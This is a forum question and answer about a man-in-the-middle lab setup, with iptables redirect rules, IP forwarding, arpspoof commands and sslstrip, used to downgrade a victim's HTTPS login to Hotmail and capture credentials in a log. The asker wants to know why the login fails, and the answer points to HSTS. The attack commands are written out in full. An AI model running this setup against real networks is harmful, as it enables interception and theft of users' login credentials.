# SSLStrip Working Partially (not login on site)

Tags: linux, ubuntu, https, iptables

I'm analysing the traffic on my Virtual Lab, using arpspoof/sslstrip.

I'm using the following script

```
iptables -A INPUT -i eth1 -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -i eth1 -p tcp --dport 8080 -j ACCEPT
iptables -A PREROUTING -t nat -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080

echo '1' > /proc/sys/net/ipv4/ip_forward
```

-- 10.10.10.2 Target

-- 10.10.10.1 Router

```
arpspoof -i eth1 -t 10.10.10.2 10.10.10.1
arpspoof -i eth1 -t 10.10.10.1 10.10.10.2

sslstrip -l 8080
```

This work partially since I can get the info in the sslstrip.log file just fine.
The problem is that the PC target (Win7 64 Bit IE 11) is unable to successfully complete the login process.

What happens is:

- On the target PC I write https://hotmail.com.ar
- It's get redirected to http://hotmail.com.ar
- I type usser & passdord
- The info is correctly save in sslstrip.log
- BUT after confirm, the browser reload the page without actually login in

What seems to be the problem ?

Thanks

Answer (score 0):

I know the question is older than two years and you have probably found a solution. I tried the same scenario for a research on Hotmail and come to the same problem.

I think the answer for this problem is that Hotmail is using for the authentication the HTTP Strict Transport Security (HSTS), that allows the server only to connect with HTTPS-connections. Uncertain I do not know why Hotmail is not using the HSTS for the inputs of the username and password and only for the authentication.

I hope I could help you